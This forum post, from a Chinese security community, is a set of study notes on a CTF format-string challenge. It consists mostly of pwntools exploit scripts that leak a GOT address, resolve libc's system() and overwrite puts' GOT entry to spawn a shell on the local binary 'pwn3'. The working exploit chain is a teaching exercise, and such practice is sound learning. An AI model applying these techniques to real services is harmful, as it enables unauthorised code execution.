PWN学习笔记【格式化字符串漏洞练习】
本文为看雪论坛优秀文章
看雪论坛作者ID:洋洋不得意
from pwn import *
# context.log_level = 'debug'
# Spawn the challenge binary and answer its FTP-style login prompt.
sh = process("./pwn3")
sh.sendlineafter(b"Name (ftp.hacker.server:Rainism):", b"rxraclhm")
def put():
    """Run the binary's ``put`` command, uploading a file called ``aaa``.

    Each prompt is awaited before its answer is sent. The uploaded content is
    the marker ``AAAA`` followed by eight ``%p`` conversions: a probe whose
    echo (via the later ``get``) shows whether, and at which argument
    position, the content reaches a printf-style call in the binary.
    """
    exchange = (
        (b"ftp>", b"put"),
        (b"please enter the name of the file you want to upload:", b"aaa"),
        (b"then, enter the content:", b'AAAA..%p..%p..%p..%p..%p..%p..%p..%p'),
    )
    for prompt, answer in exchange:
        sh.recvuntil(prompt)
        sh.sendline(answer)
def get():
    """Run the binary's ``get`` command so it prints back the file called ``aaa``."""
    exchange = (
        (b"ftp>", b"get"),
        (b"enter the file name you want to get:", b"aaa"),
    )
    for prompt, answer in exchange:
        sh.recvuntil(prompt)
        sh.sendline(answer)
# Upload the probe, read it back, dump whatever the binary echoes, then hand over the tube.
put()
get()
echoed = sh.recv()
print(echoed)
sh.interactive()
def put():
    """Upload a file called ``aaa`` whose content is ``AAAA`` plus a single ``%7$p``.

    Same ``put`` dialogue as before, but the probe now reads one specific
    argument position (7) — presumably the one identified from the earlier
    eight-``%p`` probe; confirm against that output.
    """
    exchange = (
        (b"ftp>", b"put"),
        (b"please enter the name of the file you want to upload:", b"aaa"),
        (b"then, enter the content:", b'AAAA%7$p'),
    )
    for prompt, answer in exchange:
        sh.recvuntil(prompt)
        sh.sendline(answer)
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
elf = ELF("./pwn3")
# For stepping through under a debugger instead: gdb.debug("./pwn3", "b *show_dir")
sh = process("./pwn3")
# Answer the FTP-style login prompt.
sh.sendlineafter(b"Name (ftp.hacker.server:Rainism):", b"rxraclhm")
def put(file_name, file_content):
    """Upload ``file_content`` under ``file_name`` through the binary's ``put`` command.

    Both arguments are sent verbatim (bytes expected); ``sendline`` appends the
    newline each prompt waits for.
    """
    exchange = (
        (b"ftp>", b"put"),
        (b"please enter the name of the file you want to upload:", file_name),
        (b"then, enter the content:", file_content),
    )
    for prompt, answer in exchange:
        sh.sendlineafter(prompt, answer)
def get(file_name):
    """Ask the binary to print back the file called ``file_name`` (its ``get`` command)."""
    exchange = (
        (b"ftp>", b"get"),
        (b"enter the file name you want to get:", file_name),
    )
    for prompt, answer in exchange:
        sh.sendlineafter(prompt, answer)
def dir():
    """Send the binary's ``dir`` command at the next ``ftp>`` prompt.

    NOTE: this shadows the builtin ``dir()``; the name is kept because the
    call sites below use it.
    """
    sh.sendlineafter(b"ftp>", b"dir")
def leakage_function_addr(got_addr):
    """Return the 4-byte little-endian value the binary echoes for ``got_addr``.

    Uploads a file whose content is ``%8$s`` followed by the packed
    ``got_addr``, asks the binary to print it back, and unpacks the first
    four bytes received.

    NOTE(review): ``sh.recv(4)`` returns *up to* four bytes, and ``u32``
    presumably needs exactly four, so a short read would raise here — confirm
    the reply is always buffered whole before relying on it.
    """
    probe = b'%8$s' + p32(got_addr)
    put(b'get_addr', probe)
    get(b'get_addr')
    return u32(sh.recv(4))
def compute_order_32(target):
    """Return ``target``'s four low-order bytes as ``(byte_index, byte_value)`` pairs, sorted by value.

    Index 0 is the least-significant byte. Bits above the low 32 are ignored
    because each byte is masked with ``0xff``. The sort is stable, so equal
    bytes keep ascending index order. Prints the target in hex as a trace line.
    """
    print("target=%x" % target)
    pairs = ((index, (target >> (8 * index)) & 0xff) for index in range(4))
    return sorted(pairs, key=lambda pair: pair[1])
def hack(addr, value, offset_start):
    """Upload and trigger a hand-built format string that stores ``value`` in the four bytes at ``addr``.

    The payload starts with the four packed addresses ``addr .. addr+3``; each
    byte of ``value`` (ascending order from ``compute_order_32``) is then written
    with a ``%<width>c%<position>$hhn`` pair, where ``position`` is
    ``offset_start`` plus the byte index and ``width`` is the increment needed to
    reach that byte value from the characters printed so far.

    NOTE(review): the width is a bare difference from the running count, which
    starts at 16 (the packed addresses). A target byte at or below the running
    count yields a zero or negative width, which this code does not handle;
    the later script on this page delegates that to pwntools' ``fmtstr_payload``.
    """
    ordered = compute_order_32(value)
    print(ordered)
    # Four consecutive target addresses, one per byte of the value.
    payload = b"".join(p32(addr + i) for i in range(4))
    printed = 16  # the four packed addresses already account for 16 output characters
    chunks = []
    for position, byte_value in ordered:
        width = byte_value - printed
        printed += width
        chunks.append(b"%%%dc%%%d$hhn" % (width, offset_start + position))
    payload += b"".join(chunks)
    print("addr=%x" % addr)
    debug(payload)
    put(b'hack', payload)
    get(b'hack')
# Leak printf's resolved address, then derive the libc base and system() from it.
printf_addr = leakage_function_addr(elf.got['printf'])
print(f"function_addr=0x{printf_addr:x}")
libc = LibcSearcher("printf", printf_addr)
libcBase = printf_addr - libc.dump('printf')
print(f"libcBase={libcBase:x}")
system_addr = libcBase + libc.dump('system')
print(f"system_addr={system_addr:x}")
# Overwrite puts' GOT entry, upload a file whose name is the command, then list it.
hack(elf.got['puts'], system_addr, 7)
put(b'/bin/sh;', b'get shell')
dir()
sh.interactive()
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
elf = ELF("./pwn3")
# For stepping through under a debugger instead: gdb.debug("./pwn3", "b *show_dir")  (or "b *get_file")
sh = process("./pwn3")
# Answer the FTP-style login prompt.
sh.sendlineafter(b"Name (ftp.hacker.server:Rainism):", b"rxraclhm")
def put(file_name, file_content):
    """Upload ``file_content`` under ``file_name`` through the binary's ``put`` command.

    Both arguments are sent verbatim (bytes expected); ``sendline`` appends the
    newline each prompt waits for.
    """
    exchange = (
        (b"ftp>", b"put"),
        (b"please enter the name of the file you want to upload:", file_name),
        (b"then, enter the content:", file_content),
    )
    for prompt, answer in exchange:
        sh.sendlineafter(prompt, answer)
def get(file_name):
    """Ask the binary to print back the file called ``file_name`` (its ``get`` command)."""
    exchange = (
        (b"ftp>", b"get"),
        (b"enter the file name you want to get:", file_name),
    )
    for prompt, answer in exchange:
        sh.sendlineafter(prompt, answer)
def dir():
    """Send the binary's ``dir`` command at the next ``ftp>`` prompt.

    NOTE: this shadows the builtin ``dir()``; the name is kept because the
    call sites below use it.
    """
    sh.sendlineafter(b"ftp>", b"dir")
def leakage_function_addr(got_addr):
    """Return the 4-byte little-endian value the binary echoes for ``got_addr``.

    Uploads a file whose content is ``%8$s`` followed by the packed
    ``got_addr``, asks the binary to print it back, and unpacks the first
    four bytes received.

    NOTE(review): ``sh.recv(4)`` returns *up to* four bytes, and ``u32``
    presumably needs exactly four, so a short read would raise here — confirm
    the reply is always buffered whole before relying on it.
    """
    probe = b'%8$s' + p32(got_addr)
    put(b'get_addr', probe)
    get(b'get_addr')
    return u32(sh.recv(4))
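def hack(addr, value, offset_start):
    """Upload and trigger a pwntools-generated format string that stores ``value`` at ``addr``.

    Args:
        addr: address of the 4-byte write.
        value: value to store there.
        offset_start: printf argument position at which the uploaded content
            appears. It is now passed through to ``fmtstr_payload`` instead of
            being ignored in favour of a hard-coded ``7`` (the only call site
            passes 7, so behaviour there is unchanged).
    """
    payload = fmtstr_payload(offset_start, {addr: value})
    debug(payload)
    put(b'hack', payload)
    get(b'hack')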
# Leak printf's resolved address, then derive the libc base and system() from it.
printf_addr = leakage_function_addr(elf.got['printf'])
print(f"function_addr=0x{printf_addr:x}")
libc = LibcSearcher("printf", printf_addr)
libcBase = printf_addr - libc.dump('printf')
print(f"libcBase={libcBase:x}")
system_addr = libcBase + libc.dump('system')
print(f"system_addr={system_addr:x}")
# Overwrite puts' GOT entry, upload a file whose name is the command, then list it.
hack(elf.got['puts'], system_addr, 7)
put(b'/bin/sh;', b'get shell')
dir()
sh.interactive()
看雪ID:洋洋不得意
https://bbs.pediy.com/user-home-861996.htm